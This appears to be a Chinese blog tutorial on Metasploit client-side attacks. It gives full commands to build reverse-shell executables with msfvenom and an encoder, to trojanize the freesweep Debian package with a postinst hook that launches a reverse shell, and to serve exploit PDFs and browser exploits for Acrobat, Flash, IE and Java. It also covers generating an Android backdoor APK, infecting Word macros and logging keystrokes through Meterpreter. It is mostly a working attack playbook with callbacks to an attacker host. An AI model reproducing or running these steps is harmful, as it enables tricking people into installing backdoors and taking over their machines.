Mestasploit 客户端渗透

Mestasploit 客户端渗透

1. 简介

  • 在无法突破网络边界的情况下转而攻击客户端

    • 社会工程学攻击
    • 进而渗透线上业务网络
  • 含有漏洞利用代码的 web 站点

    • 利用客户端漏洞
  • 含有漏洞利用代码的 doc、pdf等文档

  • 诱骗被害者执行 payload

2. 攻击 windows

  • 诱骗被害者执行 payload (windows)

    • msfvenom –payload-options -p windows/shell/reverse_tcp
    • msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o 1.exe

      root@kali:~# msfvenom --payload-options -p windows/shell/reverse_tcp
      root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.10.147 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe
      # 将文件拷贝到 winxp 主机
      
  • msfconsole

    • use exploit/multi/handler
    • set payload windows/shell/reverse_tcp
    • set LHOST 10.10.10.131
    • set LPORT 4444
    • exploit
    • 客户端执行文件

      msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
      msf exploit(multi/handler) > set LHOST 10.10.10.131
      msf exploit(multi/handler) > set LPORT 4444
      msf exploit(multi/handler) > exploit
      

3. 攻击 linux

  • 诱骗被害者执行 payload (linux deb 安装包)
  • cd /var/cache/apt/archives
  • dpkg -x freesweep_0.90-3+b1_amd64.deb
  • mkdir free/DEBIAN && cd free/DEBIAN
  • vi control

    Package: freesweep
    Version: 0.90-3
    Section: Games and Amusement
    Priority: optional
    Architecture:i386_64
    Maintainer: Ubuntu MOTU Developers (ubuntu-motu@ lists.ubuntu.com)
    Description: a text-based minesweeper
    Freesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.Unlike most implementations of this game,Freesweepworksinanyvisualtextdispl in Linuxconsole,inanxterm,and inmost text-based terminals currently in use.
    
  • vim postinst

    #!/bin/sh
    sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
    
  • msfvenom -a x86 –platform linux -p linux/x86/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b “\x00” -f elf -o /root/free/usr/games/freesweep_scores

  • chmod 755 postinst
  • dpkg-deb –build /root/free

    root@kali:~# apt-get --download-only install freesweep
    root@kali:~# cd /var/cache/apt/archives/
    root@kali:~# cp freesweep_0.90-3+b1_amd64.deb ~
    root@kali:~# cd 
    root@kali:~# dpkg -x freesweep_0.90-3+b1_amd64.deb free
    root@kali:~# cd free
    root@kali:~/free# mkdir debian
    root@kali:~/free# cd DEBIAN/
    
    root@kali:~/free/DEBIAN# vim control 
        Package: freesweep
        Version: 0.90-3
        Section: Games and Amusement
        Priority: optional
        Architecture:amd64
        Maintainer: Ubuntu MOTU Developers (ubuntu-motu@ lists.ubuntu.com)
        Description: a text-based minesweeper
        Freesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.Unlike most implementations of this game,Freesweepworksinanyvisualtextdispl in Linuxconsole,inanxterm,and inmost text-based terminals currently in use.
    
    root@kali:~/free/DEBIAN# vim postinst
        #!/bin/sh
        sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
    root@kali:~/free# chmod 755 postinst 
    
    # 生成 payload
    root@kali:~/free/DEBIANn# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_scores
    
    root@kali:~/free/DEBIAN# dpkg-deb --build /root/free
    
    # 受害者机器安装此软件
    root@lamp:/home/kevin/Desktop# dpkg -i free.deb 
    

4. 利用 Acrobat Reader 漏洞执行 payload

  • 构造 pdf 文件:use exploit/windows/fileformat/adobe_utilprintf

    # 构造 pdf 文件
    use exploit/windows/fileformat/adobe_utilprintf
    set payload windows/meterpreter/reverse_tcp
    msf exploit(windows/fileformat/adobe_utilprintf) > run
        [+] msf.pdf stored at /root/.msf4/local/msf.pdf
    
    # 开启监听
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit 
    
  • 构造恶意网站:use exploit/windows/browser/adobe_utilprintf

    use exploit/windows/browser/adobe_utilprintf
    set SRVPORT 80
    set URIPATH /
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    
  • Meterpreter

    • use priv
    • run post/windows/capture/keylog_recorder

5. 利用 flash 插件漏洞执行 paylaod

  • use exploit/multi/browser/adobe_flash_hacking_team_uaf

    use exploit/multi/browser/adobe_flash_hacking_team_uaf
    set SRVPORT 80
    set URIPATH /
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    
  • use exploit/multi/browser/adobe_flash_opaque_background_uaf

    use exploit/multi/browser/adobe_flash_opaque_background_uaf
    set SRVPORT 80
    set URIPATH /
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    
  • use auxiliary/server/browser_autopwn2

    use auxiliary/server/browser_autopwn2
    set SRVPORT 80
    set URIPATH /
    exploit
    

6. 利用 IE 浏览器漏洞执行 payload

  • use exploit/windows/browser/ms14_064_ole_code_execution

    use exploit/windows/browser/ms14_064_ole_code_execution
    set SRVPORT 80
    set URIPATH /
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    

7. 利用 JRE 漏洞执行 payload

  • use exploit/multi/browser/java_jre17_driver_manager

    use exploit/multi/browser/java_jre17_driver_manager
    set SRVPORT 80
    set SRVHOST 10.10.10.131
    set URIPATH /
    set payload java/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    
  • use exploit/multi/browser/java_jre17_jmxbean

    use exploit/multi/browser/java_jre17_jmxbean
    set SRVPORT 80
    set SRVHOST 10.10.10.131
    set URIPATH /
    set payload java/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    
  • use exploit/multi/browser/java_jre17_reflection_types

    use exploit/multi/browser/java_jre17_reflection_types
    set SRVPORT 80
    set SRVHOST 10.10.10.131
    set URIPATH /
    set payload java/meterpreter/reverse_tcp
    set LHOST 10.10.10.131
    exploit
    

8. 生成 android 后门程序

  • use payload/android/meterpreter/reverse_tcp
  • generate -f a.apk -p android -t raw

9. 宏感染

  • 利用宏感染 word、except 文档
  • 绕过某些基于文件类型检查的安全机制
  • 生成 vbscript 脚本:msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

  • office 2007 +

  • payload 第一部分粘入 VBA 代码
  • payload 第二部分粘入 word 正文

  • msf 启动侦听

    • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
posted on 2018-09-05 20:46 E11iot 阅读( ...) 评论( ...) 编辑 收藏

转载于:https://www.cnblogs.com/E11iot/p/9594395.html

你可能感兴趣的:(Mestasploit 客户端渗透)